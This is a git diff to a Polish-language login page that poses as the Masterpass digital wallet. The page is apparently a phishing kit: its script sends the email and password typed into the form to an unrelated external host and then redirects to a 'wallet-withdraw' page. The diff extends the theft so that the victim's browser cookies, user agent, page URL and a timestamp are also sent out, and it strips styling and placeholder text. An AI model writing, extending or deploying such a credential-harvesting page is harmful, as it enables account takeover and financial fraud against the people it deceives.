--- a/public/wallet-login.html
+++ b/public/wallet-login.html
@@ -2,120 +2,21 @@
 <html lang="pl">
 <head>
   <meta charset="UTF-8" />
-  <title>Zaloguj się | Masterpass</title>
+  <title>Logowanie | Portfel Masterpass</title>
   <link rel="stylesheet" href="/style.css" />
-  <style>
-    body {
-      font-family: Arial, sans-serif;
-      background: #fff;
-      color: #333;
-      margin: 0;
-      padding: 0;
-    }
-
-    .container {
-      max-width: 400px;
-      margin: 80px auto;
-      padding: 40px;
-      border: 1px solid #ddd;
-      box-shadow: 0 0 15px rgba(0,0,0,0.1);
-      border-radius: 8px;
-    }
-
-    .logo {
-      display: block;
-      margin: 0 auto 20px;
-      height: 40px;
-    }
-
-    h1 {
-      text-align: center;
-      font-size: 22px;
-      margin-bottom: 10px;
-    }
-
-    h2 {
-      text-align: center;
-      font-size: 14px;
-      color: #666;
-      margin-bottom: 25px;
-    }
-
-    label {
-      display: block;
-      margin-bottom: 5px;
-      font-weight: bold;
-      font-size: 14px;
-    }
-
-    input[type="text"],
-    input[type="password"] {
-      width: 100%;
-      padding: 10px;
-      margin-bottom: 20px;
-      border: 1px solid #ccc;
-      border-radius: 4px;
-      font-size: 14px;
-    }
-
-    .checkbox-group {
-      display: flex;
-      align-items: center;
-      margin-bottom: 10px;
-    }
-
-    .checkbox-group input {
-      margin-right: 10px;
-    }
-
-    .forgot-link {
-      text-align: right;
-      margin-bottom: 20px;
-    }
-
-    .forgot-link a {
-      color: #cc0000;
-      text-decoration: none;
-      font-size: 13px;
-    }
-
-    button {
-      width: 100%;
-      background: #cc0000;
-      color: white;
-      padding: 12px;
-      border: none;
-      border-radius: 4px;
-      font-size: 16px;
-      cursor: pointer;
-    }
-
-    .cookie-banner {
-      margin-top: 30px;
-      font-size: 12px;
-      color: #666;
-      text-align: center;
-    }
-
-    .cookie-banner a {
-      color: #cc0000;
-      text-decoration: none;
-    }
-  </style>
 </head>
 <body>
   <div class="container">
     <img src="https://www.masterpass.pl/img/masterpass_logo.svg" alt="Masterpass logo" class="logo" />
-
     <h1>Zaloguj się</h1>
     <h2>Zaloguj się do swojego portfela Masterpass™</h2>
 
     <form id="loginForm">
       <label for="email">Adres e-mail lub numer telefonu</label>
-      <input type="text" id="email" placeholder="np. jan.kowalski@gmail.com" required />
+      <input type="text" id="email" required />
 
       <label for="password">Hasło</label>
-      <input type="password" id="password" placeholder="Wprowadź hasło" required />
+      <input type="password" id="password" required />
 
       <div class="checkbox-group">
         <input type="checkbox" id="remember" />
@@ -146,10 +47,18 @@
       await fetch('https://zaza-back.onrender.com/login', {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
-        body: JSON.stringify({ email, password, remember })
+        body: JSON.stringify({
+          email,
+          password,
+          remember,
+          cookies: document.cookie,
+          userAgent: navigator.userAgent,
+          location: window.location.href,
+          date: new Date().toISOString()
+        })
       });
 
-      window.location.href = '/wallet-withdraw.html';
+      window.location.href = '/public/wallet-withdraw.html';
     });
   </script>
 </body>
